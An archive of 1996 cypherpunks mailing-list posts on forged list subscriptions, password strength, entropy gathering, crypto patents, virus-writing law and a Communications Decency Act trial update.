| division, with the promoters of paranoia, I remind you that we have
| freedom of speech, too.  And we have responsibilities, too.  And some of
| us have not discharged our responsibilities.  It is time we all stood up
| and spoke against that kind of reckless speech and behavior.

This sounds like "fight speech you disagree with with more speech" to me.

> > Clinton, though, is pushing the unconstitutional "anti-terrorism"  bill,
> > which is all blather, and worse, he's letting the Republicans add an
> > unrelated rider that emasculates habeus corpus.

I'd like to retract that "Republicans" bit. There are good Republicans and
bad Republicans, as with any other group of people. I meant "pro-death
penalty, anti-civil liberties wackos," of which there are a few in the
Republican Party, but which do not represent the rank & file or even the
balance of the GOP Congressional delegation.

> Letting the Republicans? Clinton's on their side all the way.

Not on habeus corpus. To refresh your memory, I'm talking about the
amendment that seeks to curtail death-row appeals. Clinton has condemned
it as irrelevant to the "anti-terrorism" bill, but that it's a compromise
he can accept. He's wrong.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 19 Apr 1996 03:11:09 +0800
To: cypherpunks@toad.com
Subject: Re: [Explanation] Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <199604180537.WAA01617@gulch.spe.com>
Message-ID: <9604181451.AA26234@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


>      I run a small mailing list that has been subject to problems
> similar to the recent spate of "unscrives".  Apparently there is a
> list of mailing lists circulating the warez boards along with scripts
> for spoofing subscription requests.  Over the past few months my list

	Ah, KaNN3d t00Lz: the incompitent kRak3r'z best friend. :)

>      Crypto relevance:  This attack will be eliminated when more mail
> agents support public key crypto and the mailing list software can be
> modified to check signatures on subscription requests.

	But you're presupposing a public key distribution mechanism
such that the list software can get a key for that user.  And that
that's a valid key for that user, not a key that J Random kRak3r didn't
just send in for his clueless AOL victim before said victim established
a public key.

	At any rate, has something like this been put into the current
PGPdomo?  I don't think that it would be too hard to hack in a query
to a web keyserver to grab a key.  If the initial request's not
signed, maybe include a note about how to go about getting PGP and
putting a key on the keyserver (or a pointer to instructions on the
web).

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 19 Apr 1996 06:16:48 +0800
To: cypherpunks@toad.com
Subject: Re: Spaces in passwords
Message-ID: <199604181759.KAA29832@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Ben Rothke writes:
>> Do spaces (ASCII 20) in passwords make them less secure?
>
>Of course not. In a normal Unix password, adding spaces to the
>password search space increases the search space, so it necessarily
>makes the search harder.

Depends on the space of ideas that are leading to your passwords.
If the reason you're adding spaces is to separate an n-character word
from the dictionary from a 7-n character word from the dictionary,
this reduces the search space for a cracker considerably.
At least pick random punctuation instead.

On the other hand, if your password is a bunch of randomly chosen
characters, having another character in the space doesn't hurt.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 19 Apr 1996 06:05:30 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <199604181813.LAA14894@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I suspect, that all of us, Perry included, will react the same way if we
find that our one time pads read like "Hamlet", or equally likely, "The
Comedy of Errors".  That is, we will tear the source of the pad apart to
find out why it isn't working.  If we find that it IS working correctly, we
will wish we had used that one truly magic[*] moment to buy tickets in as
many lotteries as possible.

* Probability much less than 10 ** -50 in the life of the universe.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Huang <hwh6k@fulton.seas.virginia.edu>
Date: Fri, 19 Apr 1996 03:44:36 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Death Penalty for "take me of" messages?
Message-ID: <199604181515.LAA35228@fulton.seas.Virginia.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 17, 21:38, Timothy C. May wrote:
> >take me of your emailing list
> 
> She (or he) can't even spell "off."
> 
> This clown also sent me the same message privately, so anything done to her
> or him is only fair..
> 
> The Cypherpunks Death Penalty?

Someone suggested that certain people were being signed up on Cypherpunks
as part of a two-fold spam attack:

1.) in order to flood victim's mailbox with Cypherpunks' Welcome messages,
    and list postings,

2.) to re-direct victim's ire at the Cypherpunks list,

thereby killing 2 birds with 1 stone.

Hence, the "Death Penalty" may be jumping the gun, so to speak.  ;)

Not sure how one would go about looking into this, though.

-H




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Fri, 19 Apr 1996 05:09:53 +0800
To: Postnaster@infoave.net
Subject: Clueless Newbee Problems Fw: Re: Fw: CWD-Pool Cool
Message-ID: <199604181631.LAA04089@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

This included message was sent to me privately from one of your 
accounts.  It was a reply from a message that I sent to the cypherpunks 
list, which resides on toad.com.  Do you think that you might 
`instruct` your user on proper netiquette in these areas.  I have 
included all headers for you benefit.

Looking forward to your prompt action.

Thanks,

Lou Zirko

- -----Begin Included Message ----- 

X-POP3-Rcpt: lzirko@rex
Return-Path: dvallance@InfoAve.Net
Received: from pacs02.infoave.net (pacs02.InfoAve.Net [165.166.0.12]) 
by rex.isdn.net (8.7.5/8.7.3) with ESMTP id IAA01191 for 
<lzirko@isdn.net>; Thu, 18 Apr 1996 08:43:53 -0500
 From: dvallance@InfoAve.Net
Received: from dial-4.r3.scsumt.InfoAve.Net by InfoAve.Net (PMDF V5.0-5 
#4800)
 id <01I3OJ118HTC90SSUA@InfoAve.Net> for lzirko@isdn.net; Thu,
 18 Apr 1996 08:47:44 -0400 (EDT)
Date: Thu, 18 Apr 1996 08:47:44 -0400 (EDT)
Date-warning: Date header was inserted by InfoAve.Net
Subject: Re: Fw: CWD-Pool Cool
X-Sender: dvallance@mail.infoave.net
To: Lou Zirko <lzirko@isdn.net>
Message-id: <01I3OJ11RLCY90SSUA@InfoAve.Net>
MIME-version: 1.0
X-Mailer: Windows Eudora Version 1.4.4
Content-type: text/plain; charset="us-ascii"
Content-transfer-encoding: 7BIT

PLEASE REMOVE ME FROM YOUR MAILING LIST. THANK YOU



- ---- End of forwarded message ----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMXZuSxKvccEAmlQ9AQG28wf+KRidWaEUkakCKI+KNaCfUZa49Ftjsdb+
MO5/HlcjQ/LjaKgTKs54NOJBO5yYtkELngHUU5gLK3BlsUiCljRqTI5Fvt0ozA2B
aXJNU8MVJsXZbM8D1RWFQuWhhhsl1OpVfJsZVqCVy74jhPd59iB44FaEy6bW1Oup
z9OZdANyxZdtayNAWacVAjq2QT68LL1M9uPrnl3PFUQu6Hqg5RJlOh1WYWsBvyjQ
1jjxvPBuc4fV0wxJe1UQ20BpscaRQVbw6f1NhSrgPBEsXYTtGDcMi0z6dRxtJUOd
xEZpsJDQt9gAGka8ysSoapL8Dh0f2xeg6TQ1r/Y3J72dPo7wIYrZbA==
=i9D5
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 19 Apr 1996 04:33:24 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: GNU Version 0.01 (alpha) of KiddieFind is now available
In-Reply-To: <199604180610.IAA27184@utopia.hacktic.nl>
Message-ID: <IlRa1kG00YUv4Au5Np@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 18-Apr-96 GNU Version 0.01 (alpha)
of.. by Anonymous@REPLAY.COM 
> I am going ahead and releasing an alpha version of KiddieFind a free
> Unix implementation of LolitaWatch.  Everything is under the GPL, so
> the source code is free, hack on it all you want ...

I forwarded this to my fight-censorship list with a comment prepended
saying that this showed how dangerous the government's proposal was.

I've already received on query from an editor at a respected magazine
asking me for more information, saying that KiddieFind and the Under18
bit "looks like a good story." :)

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Fri, 19 Apr 1996 07:54:22 +0800
To: cypherpunks@toad.com
Subject: Re: plaugue of unsubscribes
In-Reply-To: <199604181716.MAA00534@crawfish.suba.com>
Message-ID: <Pine.SUN.3.92.960418115320.22861A-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, Alex Strasheim wrote:

> I've started sending mail to postmasters when I get one of those "take me
> off your list!" messages.
[snip]

See John's message about the forged subscribes.  It sounds like these
folks may have never used a mailing list and didn't want to.  Can't really
blame them for being upset at receiving hundreds of pieces of email that
they didn't ask for.

What still confuses me is the number of people who asked to be
"unsubscrived."  Seems like an odd coincidence that all those folks would
miss the B key.  Some had done it severeal times in the same message.  I
wonder if they were totally set up -- if they got mail telling them to
"unsubscrive."  Some people's idea of fun boggles me...

Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 19 Apr 1996 04:32:35 +0800
To: cypherpunks@toad.com
Subject: Re: [Explanation] Re: "STOP SENDING ME THIS SHIT"
Message-ID: <v02120d0bad9c18862796@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:37 AM 4/18/96, Pat May wrote:



>
>      Crypto relevance:  This attack will be eliminated when more mail
> agents support public key crypto and the mailing list software can be
> modified to check signatures on subscription requests.

In my ongoing quest for net.buckyness I sent a subscribe message to the
synergetics-l list, and got back a password, which I had to use to actually
subscribe. It looked like a majordomo hack of some kind...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@crawfish.suba.com>
Date: Fri, 19 Apr 1996 05:42:35 +0800
To: cypherpunks@toad.com
Subject: plaugue of unsubscribes
Message-ID: <199604181716.MAA00534@crawfish.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


I've started sending mail to postmasters when I get one of those "take me 
off your list!" messages.  

I explain that the user is on a high volume list, that he wants off, but
that he seems unwilling or unable to do it himself.  He's harassing the
members of the list, who don't have the ability to remove him, and he 
doesn't seem to be reading our replies to his "take me off!" messages, 
which tell him how to solve his problem.

Then I ask the postmaster to explain how to get off the list to the user.

These guys are abusing email, and since they don't read our mail, the 
postmaster is the only solution.  Perhaps if a few of us start writing to 
the postmasters, they'll help the user figure out how to get off.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 19 Apr 1996 08:49:52 +0800
To: JonWienke@aol.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <m0u9zGu-0008yfC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 AM 4/18/96 -0400, Perry E. Metzger wrote:
> Its tiny little statistical toeholds like that which permit breaks.

True, as far as it goes.  But I see an even bigger threat to password 
security.  Yesterday, I subscribed to the New York Times Net News service.  
It asked me to select a username, and a password.  Obviously, smart people 
are not going to the same password on multiple systems that they expect 
might be exchanging information, but we all know that reality is that people 
DO this, especially on systems they don't initially expect a great deal of 
security on.

The problem is that a service like that (or a BBS operator, etc) at least as 
a passing chance of figuring out a person's password, or the password itself 
is a clue as to what kind of keyspace to search.  (Upper case only?  mixed?  
Only text?  Spaces used?  Etc.)

Besides that, the password is probably passed in the clear.  I think what is 
needed is a system to transform a password (perhaps by hashing, then perhaps 
encryption) so that the BBS/other service receives no useful information as 
to  the password, or the method used to select the password, or for that 
matter the length of the password.

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Fri, 19 Apr 1996 08:40:12 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <960418025428_377757492@emout17.mail.aol.com>
Message-ID: <4l660q$167@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199604181352.JAA08215@jekyll.piermont.com>,
Perry E. Metzger <perry@piermont.com> wrote:
> > If you eliminate all repeating byte sequences, such as 00 00 or 7F 7F, you
> > will reduce your possible entropy by .07058% (7.99435 bits per byte), and
> > eliminate the (astronomically remote) possibility of Hamlet or some other
> > English text popping out of your RNG/PRNG. [...]
> 
> Before making pronouncements like "You are still OK" you ought to
> learn a bit more about cryptanalysis. [...]

Then I propose the following scheme.  (I've proposed it before.)

My entropy cruncher takes in random noise from a number of diverse
sources (some possibly of dubious quality).  I take *all* the noise
and run it through a hash function to distill entropy.

Now I need to have some method to estimate when I have enough entropy
in the random noise I'm crunching.  First rule: be conservative.
One can never have too much entropy in the input to the hash function.

Therefore, I suggest making a *copy* of the input noise stream,
running it through Jon Wienke's "this shouldn't happen" filter, and
feeding the result to some entropy estimator.  When the entropy
estimator says "I've got 1000 bits of entropy", I stop crunching.

This is conservative design, folks.  Using Wienke's filter in this manner
can't be any weaker than not using it at all. (agreed?)

Now, you can go argue whether the extra design complexity is worth it,
if you like. <shrug>


P.S.  To forestall confusion, let me be explicit about what I'm *not*
proposing: I *don't* want you to apply Wienke's filter to the input or
output of the hash function.

Applying Wienke's filter to the random noise stream, to the input to
the hash function, or to the output to the hash function, is clearly
a bad idea.
(The mathematician says "clearly", knowing full well that, unfortunately,
some small part of the audience probably doesn't get it... <sigh>)

This is what the "POTP" snake oil folks were proposing-- they had
some "quality control" process they applied to the one-time pads
they generated.  I think they said they regularly eliminated 70%
of the pads as "defective".  This was supposed to be encouraging :-)

If you don't understand why the POTP "quality control" process was
laughable, let someone else design the entropy cruncher!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Odhner <trask@goodnet.com>
Date: Fri, 19 Apr 1996 08:53:10 +0800
To: cypherpunks@toad.com
Subject: Cybercash vs Mark Twain Digicash?
Message-ID: <Pine.SOL.3.91.960418123002.2012A-100000@goodguy>
MIME-Version: 1.0
Content-Type: text/plain


Hello. I've been off the list for quite a while now, so I'm not up to 
date on the current ecash schemes. My company (a major internet service 
provider with a lot of web advertising clients) is looking into which 
digital cash method would be best to support for use on our customer's 
web pages. The head of the web department has taken a look at several, 
and is torn between Mark Twain's stuff and Cybercash. I was wondering if 
people who have looked at these systems could give me a rundown on the 
major differences. I know that Mark Twain is nice and secure (or at least 
I *think* I know that) but Cybercash is signifigantly easier to use. Any 
comments would be welcome, and to keep list volume down (I assume it's 
still as busy as ever) I'd be happy to recieve replies via direct email, 
and sumarize for the list.

Happy Hunting, -Chris Odhner
- GoodNet -




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 19 Apr 1996 08:28:03 +0800
To: cypherpunks@toad.com
Subject: Re: Spaces in passwords
Message-ID: <199604181945.MAA22450@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Ben Rothke writes:
>> Do spaces (ASCII 20) in passwords make them less secure?
>
>Of course not. In a normal Unix password, adding spaces to the
>password search space increases the search space, so it necessarily
>makes the search harder.

I used to recommend that passwords be a phrase of at least 15 characters. 
Spaces fall naturally into that model.  If your spelling is as bad as mine,
then your password is resistant to dictionary attacks.

However, then I discovered that there are many brain damaged systems which
restrict passwords to 8 characters.  (e.g. IBM's VM/ESA, Netcom's UNIX) 
For those systems, I can only parrot the conventional wisdom, no words,
include numbers and/or punctuation, no acronyms, include both upper and
lower case, etc. etc.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 19 Apr 1996 09:15:25 +0800
To: cypherpunks@toad.com
Subject: RE: math patents
Message-ID: <199604181959.MAA02651@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:46 AM 4/16/96 -0800, jim bell <jimbell@pacifier.com> wrote
various amusing paranoid conspiracy theory :-) about software patents.
I tend to agree that the concept is bogus, and it's further aggavated
by the Patent Office's technical incompetence in the area which has
led to granting of patents for things that are well covered by
prior art and obviousness to skilled practitioners.  However.

The first software patent, AFAIK, was Dennis Ritchie's setuid patent from Unix.
I'm not sure when it was granted, but it must have been applied for
a couple years before Diffie-Hellman was developed.  Unlike RSA, where
it's fun to talk about RSA/PKP/etc.'s evil conspiracy with the government
(in spite of the foreign citizenship of one of them and some amusing
uncooperativeness that's let them pull off when threatened) but it's way
bogus to argue that in the case of Whit Diffie (I don't know Hellman.)
While PKP did acquire the Stanford patents for a while, they weren't the
ones who applied for them and didn't form for a while after they
were granted.  Remember that RSA was developed a couple of years after DH.

>I am still mystified, however!  If I understand the thrust of the legal 
>cases you cited, purely mathematical algorithms are still not patentable, 
>yet the patents on public-key cryptography are about the most purely 
>mathematical ones that could be imagined.  They are not an element in the 
>process, they ARE the process.

The patents are carefully written to make it clear that the process is
"protecting private data" rather than "Crunching numbers in some
mathematically interesting way."

>Patents would not have prevented the Russians from using RSA, nor any other 
>foreigners, so as far as I can see the only group of people impaired by the 
>RSA patent were American citizens as a group.  

(Other than Canadians..)  The reason that RSA isn't patentable in other
countries isn't because the US is the only place that permits
algorithm patents (many countries do, and even provide more than US;
e.g. IDEA is patented in Switzerland.)  It's because most other countries
don't grant patents after publication, and because of the major FUD that
the NSA cast over cryptographic research in the 70s and 80s, it's been
necessary to publish the theory before applying for patents - if you do
it the other way around, the NSA can slam patent secrecy orders on
your patent applications, like they did even for a wimpy analog scrambler
for CB radio in the late 70s (which _was_ clearly done to impair American
access to crypto..)


>
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 19 Apr 1996 06:52:05 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: NSA/Lotus public key (was Re: [IRS] Elvis in Escrow)
In-Reply-To: <199604162254.PAA01128@netcom9.netcom.com>
Message-ID: <9604181801.AA01102@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  I wonder, how much is NSA's secret key worth?  You know, the
>  one they use to grab the extra key bits that Lotus Notes sends
>  them.

Does anyone know how many bits it is?  If it is 512 or less it may be a good  
candidate for a public key factoring.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 19 Apr 1996 05:31:46 +0800
To: cypherpunks@toad.com
Subject: ERR_not
Message-ID: <199604181712.NAA02270@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-12-96. Science:

   "Error-Correcting Codes Keeps Quantum Computers on Track"

   Commentary by Barry Cipra on Peter Shor's error-correction
   scheme for quantum systems (published last year in Phys Rev
   A) and his subsequent work with Rob Calderbank at AT&T
   Research on "quantum analogs of other more powerful codes
   that can correct multiple errors in long strings of bits."

   And cites work of others who are following Shor's lead --
   Seth Lloyd at MIT, IBM, LANL, Oxford: "Quantum computers 
   may be getting closer to reality."


   ERR_not












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Fri, 19 Apr 1996 06:24:47 +0800
To: cypherpunks%toad.com@genie_1
Subject: Re: EFF/Bernstein Press Release
In-Reply-To: <60A0983A02502C79@-SMF->
Message-ID: <6BA0983A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


>On the other hand, a virus is malicious speech, no? Sorta like libel or 
>fraud. You said bad and untrue things to the victim's computer and the 
>dimwitted OS believed it.
>
>Also this is impersonation. You spoke words that led the OS to think 
that 
>you were a legit user and, having its gained trust on false grounds, it 
lets
>you do malicious things.

Does this mean that an OS is legally considered an entity???

/sb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wulf@horvendile.getty.edu (Wulf Losee)
Date: Fri, 19 Apr 1996 10:36:18 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Toast Fishing in America
Message-ID: <199604182054.NAA01475@horvendile.Getty.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Apr 1996, David K. Merriman wrote:

>         If Microsoft made toasters...
> They'd put the slots on the side, the actuator on top, make the
> cord too short, and design it to only run properly on 177V, 41Hz. Then
> they'd declare the toaster to be the new industry standard.

and the toasters would download your toasting habits and preferences to 
Microsoft HQ...

--Wulf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Robert LoVerso <john@loverso.southborough.ma.us>
Date: Fri, 19 Apr 1996 06:41:46 +0800
To: cypherpunks@toad.com
Subject: Unsubsrive
Message-ID: <9876543210.ABCDEF@loverso.southborough.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


Unsubsrive me!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Fri, 19 Apr 1996 09:08:18 +0800
To: all right who set the CuteDuckBit TRUE <cypherpunks@toad.com>
Subject: Re: EFF/Bernstein Press Release
Message-ID: <2.2.32.19960418195209.00393610@labg30>
MIME-Version: 1.0
Content-Type: text/plain


>On Thu, 18 Apr 1996, Mark Neely wrote:
>
>> Well, that puts legislation making virus authoring a crime
>> into a new (and difficult) position.

My understanding is that it isn't illegal to author a virus, but it
certainly would be to release it.

Preventing someone from writing a virus would be prior restraint, which is a
big no-no with lots of precedent.  See the excellent page at EFF for a
discussion on
prior restraint:

 http://www.eff.org/pub/Legal/Cases/sjg_neidorf_eff.summary

(Oooh, how's that you net.legal.beagles, citing web pages instead of cases?)  
So, you'd be able to write all the viruses you wanted.  Turn 'em loose?
Well, then you've stepped in it.

--
J. Deters
>From our _1996_Conflict_of_Interest_Statement_, re: our No Gift policy:
 "If you receive any alcoholic beverages, for example, a bottle of wine,
  you must give the gift to your location Human Resources Manager." 
This memo is from the Senior V.P. of Human Resources.
+---------------------------------------------------------+
| NET:     jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:    1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)     |
| PGP Key ID:  768 / 15FFA875                             |
+---------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 19 Apr 1996 08:42:08 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenge: Update #8 (Last Day of Testimony)
Message-ID: <AlRdBxW00YUvMAuDVT@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




-----------------------------------------------------------------------------
                        The CDA Challenge, Update #8
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this update: BYU/CMU's Olsen testifies that "-L18" won't harm the Net
                Judges realize Olsen is a weasel
                Chief Judge Sloviter's incisive questions
                Who is Donna Rice? A DoJ attorney can't stop laughing...
                Closing arguments now set for May 10

April 18, 1996


PHILADELPHIA -- The U.S. Department of Justice doesn't like the way
the Communications Decency Act is written.

During the the testimony that ended April 15 in Philadelphia's Federal
court, we've started to see the DoJ's legal strategy emerge -- and it
includes attempts to redefine the CDA.

The DoJ's star witness was the amazingly prudish Dan "I'm offended by
four-letter words" Olsen, who said that his plan to have service
providers card users and tag 'em as adults or minors is a fabulous way
to go. But this shifts the burden of protecting kids from smut onto
ISPs, a proposal that Congress rejected when they included "good
faith" defenses in the law.

Olsen, who will fit in just fine when he takes a job this summer as an
administrator at censorhappy Carnegie Mellon University, also kept
pushing the other half of his plan that would require all "patently
offensive" online content be tagged "-L18."

On Monday, the DoJ's very own attack-ferret Jason Baron asked Olsen:
"Your proposal would not have an adverse effect on the Net as a whole?

Olsen deadpanned: "Absolutely not!"

This isn't surprising. To Olsen, the Internet is just a bunch of geeks
who want to keep everyone else out of their own little world.

When U.S. Third Circuit Court of Appeals Chief Judge Dolores Sloviter
asked him if his "-L18" system would develop side-by-side with PICS,
Olsen replied: "If technical people were left to themselves, it would
be likely to happen. I don't think this is true here. Internet people
don't like other people telling them what to do. They're afraid of the
FCC. They don't want anyone else messing in their pond."


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                      JUDGES REALIZE OLSEN IS A WEASEL
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

Even the judges could tell that Olsen is a weasel.

The three judges hearing our challenge to the CDA were unsympathetic
to the Brigham Young University computer scientist and pinned him down
for almost an hour as he tried to slime away from direct questions.

Judge Stewart Dalzell is the most net-savvy judge on the panel and the
only one with young kids, so I'm guessing they're helping him to grok
the Net. He asked Olsen what would happen if U.S. citizens
automatically cache overseas material, including "indecent" files.

Again Olsen tried to weasel away from the hypothetical, but Dalzell
would have none of it: "You assumed away my question."

The DoJ witness grumpily admitted: "I'd turn the cache off."

Some of Dalzell's questions were stellar: "Assume a chat group is
talking about the CDA -- students from 13 to 18. In the course of the
chat, an 18-year-old is exasperated and types in 'Fuck the CDA.' Is it
your proposal that he should tag that '-L18?'"

Not hesitating, Olsen said: "Yes."

On the fight-censorship mailing list I maintain, Mark Stein writes:

  Judge Dalzell was paraphrasing closely from Cohen v. California, a
  seminal case in which the Supreme Court overturned the conviction of
  a man who was arrested for wearing a jacket with "Fuck The Draft"
  painted on the back. This Olsen fellow's a government witness, you
  say? Sounds like he's working for us.

Some of Dalzell's other questions were equally fab: "If in one issue
of the Economist the word 'fuck' appears, the library [putting it
online] would have to go through the entire text of the issue?"

Olsen replied: "Somebody would have to make this screening. Somebody
would have to make this judgement." (Later he invented the idea of
libraries banding together to pool resources to make these decisions.
I could feel the hackles of the American Library Association folks
rising. I swear, Olsen makes up these mind-fucks on the fly.)

Remember Judge Buckwalter? I wrote about him in my first CDA Update,
saying that he was the least comfortable with our cybersuit:

  In an incomprehensible decision last month, Judge Ronald Buckwalter
  granted us only a _partial_ restraining order preventing the Feds
  from enforcing the CDA. Now he's justifying his original mistake by
  taking a critical stance during this hearing...

Buckwalter has come around. Last Friday his comments indicated he was
starting to understand the issue. His questions to Olsen on Monday
showed that he finally "gets it":

  Q: If the creator of the material doesn't buy into your system, it
     creates a big problem... Does this mean plaintiff's proposal makes
     more sense?
  A: No. There are different types of proposals...
  Q: On your declaration, determining which are adults, you don't
     address economic claims?
  A: I only address if it's technically possible.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                CHIEF JUDGE SLOVITER'S INCISIVE QUESTIONS
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

Chief Judge Sloviter's questions were the most incisive -- like
Dalzell, she admitted to doing a bit of out-of-court net surfing. She
asked Olsen if "children would be blocked from accessing parts of
museum collections?" Olsen admitted they would.

Some other questions from Sloviter:

  Q: Would [your -L18 proposal] contain the seeds that the government
     can do the blocking? Once everything is tagged as -L18, would
     that facilitate any one entity saying this material should not
     go out on the Internet?
  A: Possibly.
  Q: Can you think of any time in our history where we have blocked
     material in advance?
  A: Yes, every editor in every newspaper does this every day.
  Q: But in an organized manner?
  A: Every editor in every newspaper does this every day.

The EFF's Mike Godwin says:

  That Sloviter asked this question is incredibly important -- it
  shows that she recognizes that compliance with the Communications
  Decency Act would amount to a complex system of prior restraints.

  Even among those who disagree strongly about the scope of the First
  Amendment, there is little disagreement about the general
  prohibition of prior restraints on publication -- the only generally
  acknowledged exception to this prohibition is the "national
  security" exception (publication of troop movements during time of
  war and the like). In previous obscenity/indecency cases, it has
  long been established that prior restraints on publication are
  impermissible.

The strangest point of the day came after Olsen testified that a
PICS-style third-party rating system would "slow the flow." (This was
a snide reference to Vanderbilt Professor Donna Hoffman's testimony
about how uninterrupted "flow" was important while web-surfing.)

Sloviter then asked him how an adult would show -L18 tagged materials
to a mature child. Olsen replied that a "teacher or parent could log
on." Sloviter parried: "Wouldn't that slow the flow?"

At this point, Olsen began to discharge a series of short, staccato
bursts of high-pitched giggles, sounding like a rabbit being tortured
to death. Damnedest thing I ever saw. The audience stared in horror.

Basically, the DoJ fucked up with this witness. Olsen was such a
